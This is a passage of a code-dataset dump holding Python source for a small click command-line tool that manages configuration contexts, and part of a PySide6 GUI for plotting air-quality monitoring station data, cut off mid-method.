{"api_name": "numpy.fromfile", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 47, "usage_type": "attribute"}, {"api_name": "struct.unpack", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.fromfile", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 53, "usage_type": "attribute"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "21580366065", "text": "#/usr/bin/env python3\nfrom pathlib import Path\n\nimport click\n\nfrom .io import load_all\nfrom .run import run_context\n\nINDENT = ' '\n@click.group(invoke_without_command=True)\n@click.option('--cucucdir', default='./confs/')\n@click.pass_context\ndef cli(ctx, cucucdir):\n ctx.obj = cucucdir\n\n if ctx.invoked_subcommand is None:\n ctx.invoke(show)\n\n@cli.command()\n@click.argument('group', default=None, required=False)\n@click.pass_obj\ndef show(cucucdir, group):\n _, groups, _ = load_all(cucucdir)\n\n if group:\n groups = {k: v for k, v in groups.items() if k == group}\n if not groups:\n raise click.BadParameter('A group with the name \"{}\" does not exist'.format(group))\n\n for group in groups.values():\n click.secho('Group ', nl=False)\n click.secho(group.name, nl=False, bold=True)\n click.secho(':')\n \n for context in group.contexts.values():\n click.secho(INDENT, nl=False)\n click.secho('Context ', nl=False)\n click.secho(context.name, nl=False, bold=True)\n click.secho(': ', nl=False)\n click.secho(run_context(context, 'get'))\n\n@cli.command()\n@click.pass_obj\n@click.argument('vs_name')\ndef set(cucucdir, vs_name):\n vs_dir = Path(cucucdir, 'valuesets')\n _, groups, vss = load_all(cucucdir)\n click.secho('Switching to ', nl=False)\n click.secho(vs_name, bold=True)\n\n if vs_name in vss:\n vs = vss[vs_name]\n group = vs.group\n for ctx_name, value in vs.values.items():\n click.secho('Setting context {} to \"{}\"'.format(ctx_name, value))\n ctx = group.contexts[ctx_name]\n run_context(ctx, 'set', value)\n else:\n valuesets = ', '.join(['\"{}\"'.format(vs) for vs in vss.keys()])\n raise click.BadParameter('Unknown Valueset \"{}\", the following are available: {}'.format(vs_name, valuesets))\n\n@cli.command()\n@click.pass_obj\n@click.argument('what', required=False, default=None)\ndef list(cucucdir, what):\n contexts, groups, valuesets = load_all(cucucdir)\n \n if what == 
'contexts' or what is None:\n for context in contexts.values():\n click.secho('Context ', nl=False)\n click.secho(context.name, bold=True, nl=False)\n click.secho(' getting with ', nl=False)\n click.secho(context.get, fg='yellow', nl=False)\n click.secho(' and setting with ', nl=False),\n click.secho(context.set, fg='yellow')\n if context.parser:\n click.secho(' (parsing results with \"{}\")'.format(context.parser))\n if what == 'groups' or what is None:\n for group in groups.values():\n click.secho('Group ', nl=False)\n click.secho(group.name, bold=True, nl=False)\n click.secho(' consisting of contexts ', nl=False)\n click.secho(', '.join(group.contexts), bold=True)\n if what == 'valuesets' or what is None:\n for valueset in valuesets.values():\n click.secho('Valueset ', nl=False)\n click.secho(valueset.name, bold=True, nl=False)\n click.secho(' for group ', nl=False)\n click.secho(valueset.group.name, bold=True, nl=False)\n click.secho(' with values ')\n for ctx, val in valueset.values.items():\n click.secho('\\t', nl=False)\n click.secho('{} = {}'.format(ctx, val))\n", "repo_name": "wonderb0lt/cucuc", "sub_path": "cucuc/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3115, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "click.group", "line_number": 10, "usage_type": "call"}, {"api_name": "click.option", "line_number": 11, "usage_type": "call"}, {"api_name": "click.pass_context", "line_number": 12, "usage_type": "attribute"}, {"api_name": "io.load_all", "line_number": 23, "usage_type": "call"}, {"api_name": "click.BadParameter", "line_number": 28, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 31, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 32, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 33, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 36, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 37, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 38, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 39, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 40, "usage_type": "call"}, {"api_name": "run.run_context", "line_number": 40, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 20, "usage_type": "call"}, {"api_name": "click.pass_obj", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 46, "usage_type": "call"}, {"api_name": "io.load_all", "line_number": 47, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 48, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 49, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 55, "usage_type": "call"}, {"api_name": "run.run_context", "line_number": 57, "usage_type": "call"}, {"api_name": "click.BadParameter", "line_number": 60, "usage_type": "call"}, {"api_name": "click.pass_obj", "line_number": 43, "usage_type": "attribute"}, {"api_name": "click.argument", "line_number": 44, "usage_type": "call"}, {"api_name": "io.load_all", "line_number": 66, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 70, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 71, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 72, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 73, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 74, 
"usage_type": "call"}, {"api_name": "click.secho", "line_number": 75, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 77, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 80, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 81, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 82, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 83, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 86, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 87, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 88, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 89, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 90, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 92, "usage_type": "call"}, {"api_name": "click.secho", "line_number": 93, "usage_type": "call"}, {"api_name": "click.pass_obj", "line_number": 63, "usage_type": "attribute"}, {"api_name": "click.argument", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "2299581077", "text": "import ctypes\r\nimport sys\r\nimport utilitarios\r\nimport gc\r\nimport graphictools\r\nimport os\r\nimport data_management\r\nimport numpy as np\r\nimport matplotlib as mpl\r\nimport xlsxwriter\r\nimport json\r\n\r\nfrom PySide6.QtWidgets import (QTreeWidgetItem, QGridLayout, QApplication,\r\nQFileDialog, QMainWindow, QTreeWidget, QHBoxLayout, QWidget, QPushButton,\r\nQLabel, QDateEdit, QVBoxLayout, QComboBox, QLineEdit, QSpinBox, QWidget,\r\nQTabWidget, QGroupBox, QTableWidget, QTableWidgetItem, QColorDialog,\r\nQCheckBox, QHeaderView, QDialog, QMessageBox, QDoubleSpinBox, QFrame, \r\nQStyle, QTabBar, QStylePainter, QProxyStyle, QStyleOptionTab)\r\nfrom PySide6.QtCore import QDate, Qt, QRect, QPoint\r\nfrom PySide6.QtGui import QColor, QIcon, QAction, QFontDatabase\r\n\r\nclass QHLine(QFrame):\r\n '''\r\n Classe responsável por desenhar uma linha horizontal (Widget)\r\n '''\r\n def __init__(self):\r\n super(QHLine, self).__init__()\r\n self.setFrameShape(QFrame.HLine)\r\n self.setFrameShadow(QFrame.Sunken)\r\n\r\nclass Tabela(QTreeWidget):\r\n '''\r\n Classe responsável pela operação da tabela do gerenciamento de estações\r\n de monitoramento.\r\n '''\r\n\r\n def __init__(self, parent = None):\r\n super().__init__()\r\n self.setHeaderLabels([\"Estações de monitoramento\"])\r\n self.header().setSectionResizeMode(QHeaderView.ResizeToContents)\r\n self.header().resizeSections()\r\n self.parentWidget = parent\r\n self.setColumnCount(1)\r\n self.itemChanged.connect(self.update_selection)\r\n self.items = []\r\n\r\n def update(self):\r\n # Atualiza a tabela sempre que um item é excluido ou adicionado\r\n self.clear()\r\n items = []\r\n for i in range(len(self.parentWidget.arquivos)):\r\n entity = self.parentWidget.arquivos[i]\r\n ini = entity.ini.item().strftime(\"%d/%m/%Y\")\r\n fim = entity.fim.item().strftime(\"%d/%m/%Y\")\r\n parent = QTreeWidgetItem(self)\r\n text = f'{entity.tipo} - {entity.nome:40} {ini:10} a {fim:10}'\r\n parent.setText(0, text)\r\n for j in range(len(entity.vars)):\r\n child = QTreeWidgetItem(parent)\r\n child.setFlags(child.flags() | Qt.ItemIsUserCheckable)\r\n child.setText(0, entity.vars[j])\r\n child.setData(1, 0, i)\r\n child.setData(2, 0, j)\r\n check_state = Qt.Checked if entity.vars_selected[j] else Qt.Unchecked\r\n child.setCheckState(0, check_state)\r\n\r\n items.append(parent)\r\n self.items = items\r\n\r\n def update_selection(self, item, column):\r\n\r\n # 
verifica se a coluna acionada é a zero\r\n if column == 0: \r\n entity_idx = item.data(1, 0)\r\n var_idx = item.data(2, 0)\r\n\r\n # verifica se os indices sao objetos None\r\n if entity_idx is None or var_idx is None:\r\n return None\r\n\r\n # continua o procedimento\r\n state = 0\r\n if item.checkState(column) == Qt.Checked:\r\n state = 1\r\n\r\n self.parentWidget.arquivos[entity_idx].vars_selected[var_idx] = state\r\n\r\n return None\r\n\r\n\r\nclass TabelaEixos(QTreeWidget):\r\n '''\r\n Classe responsável pela tabela relacionada a formatação dos eixos\r\n horizontal e vertical, na aba \"Gráfico\".\r\n '''\r\n\r\n def __init__(self, parentWidget = None):\r\n super().__init__()\r\n self.parentWidget = parentWidget\r\n self.setColumnCount(2)\r\n self.setHeaderLabels([\"Propriedades\", \"Valor\"])\r\n self.header().setSectionResizeMode(QHeaderView.Stretch)\r\n self.header().resizeSections()\r\n\r\n # variaveis\r\n self.items_timeseries = {\r\n \"Eixo Horizontal\" : [\r\n \"Intervalo\",\r\n \"Unidade\",\r\n \"Rotação (°)\",\r\n \"Tamanho da fonte\"],\r\n \"Eixo Vertical\" : [\"Número de rótulos\", \"Valor máximo\",\r\n \"Valor mínimo\", \"Tamanho da fonte\"]\r\n }\r\n self.items_scatterplot = {\r\n 'Eixo Horizontal' : [\r\n 'Número de rótulos',\r\n 'Valor máximo',\r\n 'Valor mínimo',\r\n \"Tamanho da fonte\"\r\n ],\r\n 'Eixo Vertical' : [\r\n 'Número de Rótulos',\r\n 'Valor Máximo',\r\n 'Valor Mínimo',\r\n \"Tamanho da fonte\",\r\n ]\r\n }\r\n self.active_scatter = 0\r\n\r\n # Widgets\r\n self.intervalo = QSpinBox()\r\n self.unidade = QComboBox()\r\n self.rotation_x = QSpinBox()\r\n self.size_y = QSpinBox()\r\n self.fontsize_x = QSpinBox()\r\n self.fontsize_y = QSpinBox()\r\n self.max_y = QDoubleSpinBox()\r\n self.min_y = QDoubleSpinBox()\r\n self.size_x = QSpinBox()\r\n self.max_x = QDoubleSpinBox()\r\n self.min_x = QDoubleSpinBox()\r\n \r\n # widgets list\r\n self.widgets = [\r\n {\r\n 'Eixo Horizontal': [self.intervalo, self.unidade,\r\n self.rotation_x, self.fontsize_x],\r\n 'Eixo Vertical' : [self.size_y, self.max_y,\r\n self.min_y, self.fontsize_y]\r\n },\r\n {\r\n 'Eixo Horizontal': [self.size_x, self.max_x,\r\n self.min_x, self.fontsize_x],\r\n 'Eixo Vertical' : [self.size_y, self.max_y,\r\n self.min_y, self.fontsize_y] \r\n }\r\n ]\r\n\r\n # configurando widgets\r\n self.intervalo.setRange(1, 30)\r\n self.unidade.addItems(['Dia', 'Mês', 'Ano'])\r\n self.unidade.setCurrentIndex(1)\r\n self.size_x.setMinimum(1)\r\n self.size_y.setMinimum(2)\r\n self.max_y.setRange(-100000, 100000)\r\n self.min_y.setRange(-100000, 100000)\r\n self.fontsize_x.setRange(1, 30)\r\n self.fontsize_y.setRange(1, 30)\r\n self.rotation_x.setRange(0, 180)\r\n mplcanvas = self.parentWidget.canvas\r\n self.size_x.setMaximum(mplcanvas.xticks.shape[0])\r\n self.size_x.setValue(int(mplcanvas.xtick_size))\r\n self.size_y.setValue(int(mplcanvas.ytick_size))\r\n self.max_y.setValue(float(mplcanvas.ytick_max))\r\n self.min_y.setValue(float(mplcanvas.ytick_min))\r\n self.max_x.setValue(float(mplcanvas.xtick_max))\r\n self.min_x.setValue(float(mplcanvas.xtick_min))\r\n self.fontsize_x.setValue(int(mplcanvas.xticks_fontsize))\r\n self.fontsize_y.setValue(int(mplcanvas.yticks_fontsize))\r\n \r\n # procedimentos\r\n self.run()\r\n \r\n # Signals and Slots\r\n self.size_x.textChanged.connect(self.changeHorizontalContents)\r\n self.fontsize_x.valueChanged.connect(self.changeHorizontalContents)\r\n self.fontsize_y.valueChanged.connect(self.changeVerticalContents)\r\n 
self.size_y.textChanged.connect(self.changeVerticalContents)\r\n self.max_y.editingFinished.connect(self.changeVerticalContents)\r\n self.min_y.editingFinished.connect(self.changeVerticalContents)\r\n self.rotation_x.textChanged.connect(self.changeHorizontalContents)\r\n self.intervalo.textChanged.connect(self.changeHorizontalContents)\r\n self.unidade.activated.connect(self.changeHorizontalContents)\r\n\r\n def changeVerticalContents(self):\r\n size = self.size_y.value()\r\n min_ = self.min_y.value()\r\n max_ = self.max_y.value()\r\n fontsize = self.fontsize_y.value()\r\n this = {\"size\" : size, \"min_\": min_, \"max_\": max_, \"fontsize\":fontsize}\r\n self.parentWidget.canvas.smart_yticks(**this)\r\n self.updateProperties()\r\n return None\r\n\r\n def changeHorizontalContents(self):\r\n size = self.size_x.value()\r\n rotation = self.rotation_x.value()\r\n intervalo = self.intervalo.value()\r\n range_format = self.unidade.currentText()\r\n fontsize = self.fontsize_x.value()\r\n this = {\"size\": size, \"rotation\": rotation, \"fontsize\" : fontsize,\r\n \"daterange\": intervalo, \"dateformat\": range_format}\r\n self.parentWidget.canvas.smart_xticks(**this)\r\n self.updateProperties()\r\n return None\r\n\r\n def updateProperties(self):\r\n self.max_y.setValue(float(self.parentWidget.canvas.ytick_max))\r\n self.min_y.setValue(float(self.parentWidget.canvas.ytick_min))\r\n self.max_x.setValue(float(self.parentWidget.canvas.xtick_max))\r\n self.min_x.setValue(float(self.parentWidget.canvas.xtick_min))\r\n return None\r\n\r\n def run(self):\r\n items = self.items_timeseries\r\n if self.active_scatter: items = self.items_scatterplot\r\n TreeWidgetItems = []\r\n widgets = self.widgets[self.active_scatter]\r\n for key in widgets.keys():\r\n item = QTreeWidgetItem([key])\r\n TreeWidgetItems.append(item)\r\n\r\n self.insertTopLevelItems(0, TreeWidgetItems)\r\n j = 0\r\n for key, values in widgets.items():\r\n for i in range(len(values)):\r\n properties = items[key][i]\r\n child = QTreeWidgetItem()\r\n child.setText(0, properties)\r\n TreeWidgetItems[j].addChild(child)\r\n self.setItemWidget(child, 1, values[i])\r\n\r\n j += 1\r\n \r\n return None\r\n\r\n\r\nclass PropriedadesTab(QWidget):\r\n '''\r\n Classe responsável pela tab \"Gráfico\" e funcionamento da:\r\n - linha horizontal (limite);\r\n - Cor e label dos objetos na legenda da figura;\r\n - Propriedades da legenda da figura;\r\n - Tipo de gráfico\r\n - Propriedades dos títulos do gráfico, eixo X e eixo Y.\r\n '''\r\n\r\n def __init__(self, canvas = None):\r\n super().__init__()\r\n self.canvas = canvas\r\n\r\n # Widgets\r\n self.rotulos = [\"Título do gráfico\", \"Título (eixo horizontal)\",\r\n \"Título (eixo vertical)\"]\r\n self.ax_properties = [\".title\", \".xaxis.get_label()\",\r\n \".yaxis.get_label()\"]\r\n self.eixos = TabelaEixos(parentWidget = self)\r\n formatGroup = QGroupBox(\"Formatação\")\r\n self.bold = QPushButton(text = \"B\")\r\n self.elementos = QComboBox()\r\n self.textline = QLineEdit()\r\n self.fontsize = QSpinBox()\r\n #\r\n self.legend_colors = QTableWidget()\r\n legendGroup = QGroupBox(\"Legenda\")\r\n self.legend_cols = QSpinBox()\r\n self.legend_fontsize = QSpinBox()\r\n #\r\n LimiteGroup = QGroupBox(\"\")\r\n TipoGroup = QGroupBox(\"Tipo de gráfico\")\r\n self.grafico_tipo = QComboBox()\r\n self.check_limite = QCheckBox()\r\n self.value_limite = QSpinBox()\r\n \r\n # configurando widgets\r\n self.bold.setStyleSheet(\"font-weight: bold\")\r\n self.elementos.addItems(self.rotulos)\r\n self.fontsize.setRange(1, 
50)\r\n self.bold.setCheckable(True)\r\n #\r\n self.legend_cols.setRange(1, 10)\r\n self.legend_cols.setValue(5)\r\n self.legend_fontsize.setRange(1, 30)\r\n self.legend_fontsize.setValue(10)\r\n #\r\n self.grafico_tipo.addItems([\"Gráfico de linha\", \"Gráfico de barra\", \r\n \"Gráfico de ultrapassagens\"])\r\n self.value_limite.setMaximum(10000)\r\n\r\n # Layouts\r\n SubLayout = QVBoxLayout()\r\n SubLayout.addWidget(QLabel(\"Elementos dos eixos\"))\r\n SubLayout.addWidget(self.eixos)\r\n #\r\n FormatLayout2 = QGridLayout()\r\n FormatLayout2.addWidget(self.elementos, 0, 0, 1, 3)\r\n FormatLayout2.addWidget(self.textline, 1, 0)\r\n FormatLayout2.addWidget(self.fontsize, 1, 1)\r\n FormatLayout2.addWidget(self.bold, 1, 2)\r\n formatGroup.setLayout(FormatLayout2)\r\n #\r\n LimiteLayout = QHBoxLayout()\r\n LimiteLayout.addWidget(QLabel(\"Incluir limite\"))\r\n LimiteLayout.addWidget(self.check_limite)\r\n LimiteLayout.addWidget(QLabel(\"Valor\"))\r\n LimiteLayout.addWidget(self.value_limite)\r\n LimiteLayout.setStretch(3, 10)\r\n LimiteGroup.setLayout(LimiteLayout)\r\n grafico_tipo_Layout = QHBoxLayout()\r\n grafico_tipo_Layout.addWidget(self.grafico_tipo)\r\n TipoGroup.setLayout(grafico_tipo_Layout)\r\n FormatLayout = QVBoxLayout()\r\n FormatLayout.addWidget(LimiteGroup)\r\n FormatLayout.addWidget(formatGroup) \r\n FormatLayout.addWidget(TipoGroup)\r\n #\r\n positionLayout = QHBoxLayout()\r\n positionLayout.addWidget(QLabel(\"Colunas\"))\r\n positionLayout.addWidget(self.legend_cols)\r\n positionLayout.addWidget(QLabel(\"Tamanho\"))\r\n positionLayout.addWidget(self.legend_fontsize)\r\n positionLayout.setStretch(1, 2)\r\n displayLayout = QVBoxLayout()\r\n displayLayout.addLayout(positionLayout)\r\n displayLayout.addWidget(self.legend_colors)\r\n legendGroup.setLayout(displayLayout)\r\n #\r\n MainLayout = QHBoxLayout()\r\n MainLayout.addLayout(FormatLayout)\r\n MainLayout.addLayout(SubLayout)\r\n MainLayout.addWidget(legendGroup)\r\n self.setLayout(MainLayout)\r\n\r\n # Signals and Slots\r\n self.legend_colors.cellDoubleClicked.connect(self.choose_color)\r\n self.legend_colors.cellChanged.connect(self.change_label)\r\n self.legend_cols.valueChanged.connect(self.updateLegendFormat)\r\n self.legend_fontsize.valueChanged.connect(self.updateLegendFormat)\r\n self.elementos.activated.connect(self.format_options)\r\n self.textline.editingFinished.connect(self.set_label)\r\n self.fontsize.valueChanged.connect(self.set_fontsize)\r\n self.bold.clicked.connect(self.set_bold)\r\n\r\n # chamando funcoes\r\n self.format_options()\r\n\r\n def updateLegendFormat(self):\r\n ncols = self.legend_cols.value()\r\n size = self.legend_fontsize.value()\r\n self.canvas.updateLegend(ncols, size)\r\n return None\r\n\r\n def change_label(self, row, column):\r\n if column != 0:\r\n return None\r\n \r\n new_label = self.legend_colors.item(row, column).text()\r\n item_id = self.legend_colors.item(row, 2).text()\r\n \r\n ncols = self.legend_cols.value()\r\n size = self.legend_fontsize.value()\r\n self.canvas.alias[item_id] = new_label\r\n self.canvas.updateLegend(ncols, size)\r\n\r\n return None\r\n \r\n def choose_color(self, row, column):\r\n if column != 1:\r\n return None\r\n \r\n item = self.legend_colors.item(row, column)\r\n Color = item.background().color()\r\n id_ = self.legend_colors.item(row, 2).text()\r\n color_picker = QColorDialog().getColor(Color, title = \"Gerenciador de cores\")\r\n if color_picker.isValid():\r\n rgba = color_picker.getRgb()\r\n item.setBackground(QColor.fromRgb(*rgba))\r\n 
self.canvas.updateColor(id_, tuple(i/255 for i in rgba))\r\n \r\n ncols = self.legend_cols.value()\r\n size = self.legend_fontsize.value()\r\n self.canvas.updateLegend(ncols, size)\r\n return None\r\n\r\n def set_label(self):\r\n ax_properties = [\".label\", \".xlabel\", \".ylabel\"]\r\n text = eval(\"self.canvas.axes{}\".format(self.ax_properties[self.elementos.currentIndex()]))\r\n novo_texto = self.textline.text()\r\n text.set_text(novo_texto)\r\n exec(\"self.canvas{} = novo_texto\".format(ax_properties[self.elementos.currentIndex()]))\r\n self.canvas.draw()\r\n return None\r\n\r\n def set_fontsize(self):\r\n ax_properties = [\".label\", \".xlabel\", \".ylabel\"]\r\n text = eval(\"self.canvas.axes{}\".format(self.ax_properties[self.elementos.currentIndex()]))\r\n text.set_fontsize(self.fontsize.value())\r\n exec(\"self.canvas{}_fontsize = {}\".format(ax_properties[self.elementos.currentIndex()], self.fontsize.value()))\r\n self.canvas.draw()\r\n return None\r\n\r\n def set_bold(self):\r\n ax_properties = [\".label\", \".xlabel\", \".ylabel\"]\r\n text = eval(\"self.canvas.axes{}\".format(self.ax_properties[self.elementos.currentIndex()]))\r\n fontweight = [\"normal\", \"bold\"]\r\n boolean = self.bold.isChecked()\r\n text.set_fontweight(fontweight[boolean])\r\n exec(\"self.canvas{}_fontweight = fontweight[boolean]\".format(ax_properties[self.elementos.currentIndex()]))\r\n self.canvas.draw()\r\n return None\r\n\r\n def format_options(self):\r\n ax_properties = [\".label\", \".xlabel\", \".ylabel\"]\r\n idx = ax_properties[self.elementos.currentIndex()]\r\n self.textline.setText(\r\n eval(\"self.canvas{}{}\".format(idx, \"\")))\r\n self.fontsize.setValue(\r\n eval(\"int(self.canvas{}{})\".format(idx, \"_fontsize\")))\r\n self.bold.setChecked(\r\n eval(\"self.canvas{}{}\".format(idx, \"_fontweight\"))== \"bold\")\r\n return None\r\n\r\n def stretchHeader(self):\r\n Header = self.legend_colors.horizontalHeader()\r\n Header.setSectionResizeMode(QHeaderView.Stretch)\r\n Header.resizeSections()\r\n return None\r\n\r\n def update_table(self):\r\n colors = self.canvas.colors\r\n alias = self.canvas.alias\r\n h, labels = self.canvas.axes.get_legend_handles_labels()\r\n self.legend_colors.setRowCount(len(labels))\r\n self.legend_colors.setColumnCount(3)\r\n self.legend_colors.setHorizontalHeaderLabels([\"Nome\",\r\n \"Cor da Legenda\", \"ID\"])\r\n self.legend_colors.setColumnHidden(2, True)\r\n\r\n i = 0\r\n for id_ in labels:\r\n item_name = QTableWidgetItem(alias[id_])\r\n item_color = QTableWidgetItem()\r\n item_id = QTableWidgetItem(id_)\r\n temp = (np.array(colors[id_])*255).astype(int)\r\n item_color.setBackground(QColor.fromRgb(*temp))\r\n #\r\n item_name.setFlags(item_name.flags())\r\n item_color.setFlags(item_color.flags() & ~Qt.ItemIsEditable)\r\n #\r\n self.legend_colors.setItem(i, 2, item_id)\r\n self.legend_colors.setItem(i, 1, item_color)\r\n self.legend_colors.setItem(i, 0, item_name)\r\n i += 1\r\n\r\n self.stretchHeader()\r\n return None\r\n\r\n\r\nclass MainWindow(QMainWindow):\r\n '''\r\n Janela principal do programa\r\n '''\r\n\r\n def __init__(self):\r\n super().__init__()\r\n # splash = SplashScreen()\r\n self.version = 1.1\r\n\r\n # Propriedades da janela\r\n self.setWindowTitle(\"ArES\")\r\n self.resize(1000, 700) # largura, altura\r\n self.logo_icon = QIcon()\r\n self.logo_icon.addFile(\".\\\\icons\\\\logo.ico\")\r\n self.setWindowIcon(self.logo_icon)\r\n\r\n # variaveis criadas para o gerenciamento da janela\r\n self.save_dir = 
os.path.expanduser(mpl.rcParams['savefig.directory'])\r\n self.ds = None\r\n self.results = {}\r\n self.signature = []\r\n self.arquivos = []\r\n self.inventory = data_management.Inventario(parent = self)\r\n self.configs = self.first_launch()\r\n self.lista_calculo = [\"Nenhum\", \"Média móvel\", \"Média aritmética\",\r\n \"Média geométrica\", \"Média harmônica\"]\r\n\r\n # Widget Principal\r\n widget = QWidget(self)\r\n self.setCentralWidget(widget)\r\n\r\n # Outros Widgets\r\n self.dataset_dialog = DatasetDialog(self)\r\n self.botao_abrir = QPushButton(\"Adicionar\")\r\n self.botao_remover = QPushButton(\"Remover\")\r\n self.botao_limpar = QPushButton(\"Limpar\")\r\n self.botao_configs = QPushButton(\"Configurações\")\r\n self.botao_processar = QPushButton(\"Processar\")\r\n self.tabela = Tabela(self)\r\n self.data_ini = QDateEdit(QDate.currentDate().addMonths(-1))\r\n self.data_fim = QDateEdit(QDate.currentDate())\r\n self.user_operations = OperationsTable(self)\r\n save_icon = QIcon.fromTheme(\"document-save\",\r\n QIcon(\".\\\\icons\\\\icon_save.ico\"))\r\n saveAct = QAction(save_icon, \"Salvar como tabela...\", self)\r\n saveAct.triggered.connect(self.exportar_excel)\r\n\r\n # Canvas Matplotlib\r\n self.canvas = graphictools.MplCanvas(self)\r\n self.toolbar = graphictools.NavigationToolbar(self.canvas, self)\r\n self.toolbar.addAction(saveAct)\r\n \r\n # Tab Dados\r\n DadosLayout = QHBoxLayout()\r\n TabelaLayout = QVBoxLayout()\r\n ButtonTabelaLayout = QHBoxLayout()\r\n #\r\n ButtonTabelaLayout.addWidget(self.botao_abrir)\r\n ButtonTabelaLayout.addWidget(self.botao_remover)\r\n ButtonTabelaLayout.addWidget(self.botao_limpar)\r\n #\r\n TabelaLayout.addLayout(ButtonTabelaLayout)\r\n TabelaLayout.addWidget(self.tabela)\r\n #\r\n DataLayout = QHBoxLayout()\r\n DataLayout.addWidget(QLabel(\"Período: \"))\r\n DataLayout.addWidget(self.data_ini)\r\n DataLayout.addWidget(QLabel(\" a \"))\r\n DataLayout.addWidget(self.data_fim)\r\n DataLayout.addStretch(5)\r\n DataLayout.addWidget(self.botao_configs)\r\n DataLayout.addWidget(self.botao_processar)\r\n #\r\n ParametrosLayout = QGridLayout()\r\n ParametrosLayout.addLayout(DataLayout, 0, 1)\r\n ParametrosLayout.setColumnStretch(1, 10)\r\n ParametrosLayout.addWidget(self.user_operations, 2, 1)\r\n #\r\n DadosLayout.addLayout(TabelaLayout)\r\n DadosLayout.addLayout(ParametrosLayout)\r\n #\r\n self.DadosTab = QWidget()\r\n self.DadosTab.setLayout(DadosLayout)\r\n\r\n # Tab Widget\r\n self.tab = QTabWidget()\r\n self.GraficoTab = PropriedadesTab(self.canvas)\r\n self.tab.addTab(self.DadosTab, \"Dados\")\r\n self.tab.addTab(self.GraficoTab, \"Gráfico\")\r\n \r\n # Layout principal (central) do programa\r\n MainLayout = QGridLayout()\r\n MainLayout.addWidget(self.tab, 2, 0)\r\n MainLayout.addWidget(self.canvas, 1, 0)\r\n MainLayout.addWidget(self.toolbar, 0, 0)\r\n MainLayout.setRowStretch(1, 4)\r\n MainLayout.setRowStretch(2, 1)\r\n widget.setLayout(MainLayout) # Coloca o Layout principal na Janela (Importante)\r\n\r\n # Signals and Slots\r\n self.botao_abrir.clicked.connect(self.openDatasetWindow)\r\n self.botao_remover.clicked.connect(self.remover_arquivo)\r\n self.botao_limpar.clicked.connect(self.clean_files)\r\n self.botao_processar.clicked.connect(self.processar)\r\n self.GraficoTab.check_limite.stateChanged.connect(self.updateGraph)\r\n self.GraficoTab.value_limite.editingFinished.connect(self.updateGraph)\r\n self.GraficoTab.grafico_tipo.currentTextChanged.connect(self.updateGraph)\r\n 
self.botao_configs.clicked.connect(self.openConfigWindow)\r\n # splash.close()\r\n\r\n def first_launch(self):\r\n userhome_directory = os.path.expanduser(\"~\")\r\n ArES_dir = os.path.join(userhome_directory, '.ArES')\r\n\r\n # Criando JSON com as configuracoes iniciais\r\n data = {}\r\n data['conexao'] = dict(\r\n host = \"PC-INV109399\",\r\n username = 'lucassm',\r\n database = \"banco_gear\"\r\n )\r\n data['representatividade'] = {\r\n \"Diária\": 75,\r\n \"Mensal\": 75,\r\n \"Anual\": 50,\r\n \"No período\": 0,\r\n \"Média móvel\": 75,\r\n \"Geral\" : 75\r\n }\r\n data['criterios_dados'] = [True, False, False]\r\n data['converter'] = {\r\n 'ppb2ppm' : False\r\n }\r\n data['semiautomatica'] = {\r\n 'data_referencia' : '2017-01-06',\r\n 'frequencia_dias' : 6\r\n }\r\n data['version'] = self.version\r\n\r\n fname = os.path.join(ArES_dir, 'launch_config.json')\r\n\r\n # Manipulacoes\r\n try:\r\n # Se o diretorio nao existir, cria ele\r\n os.makedirs(ArES_dir, exist_ok=True)\r\n\r\n # se o arquivo JSON com as configuracoes existir, provcoa um erro\r\n exists = os.path.isfile(fname)\r\n if not exists:\r\n with open(fname, 'w', encoding='utf-8') as f:\r\n json.dump(data, f, ensure_ascii=False, indent=4)\r\n\r\n else:\r\n raise FileExistsError\r\n\r\n except FileExistsError:\r\n # se o diretorio e o arquivo existirem, importa ele no programa\r\n with open(fname, 'r', encoding='utf-8') as f:\r\n existing_data = json.load(f)\r\n \r\n for k, v in existing_data.items():\r\n data[k] = v\r\n \r\n data['version'] = self.version\r\n\r\n return data\r\n \r\n def save_configs(self):\r\n data = self.configs\r\n userhome_directory = os.path.expanduser(\"~\")\r\n ArES_dir = os.path.join(userhome_directory, '.ArES')\r\n fname = os.path.join(ArES_dir, 'launch_config.json')\r\n with open(fname, 'w', encoding='utf-8') as f:\r\n json.dump(data, f, ensure_ascii=False, indent=4)\r\n \r\n return None\r\n \r\n def openConfigWindow(self):\r\n\r\n dialog = MyDialog(self)\r\n dialog.show()\r\n dialog.exec()\r\n\r\n def openDatasetWindow(self):\r\n if not self.dataset_dialog.isVisible():\r\n self.dataset_dialog.show()\r\n self.dataset_dialog.exec()\r\n\r\n else:\r\n 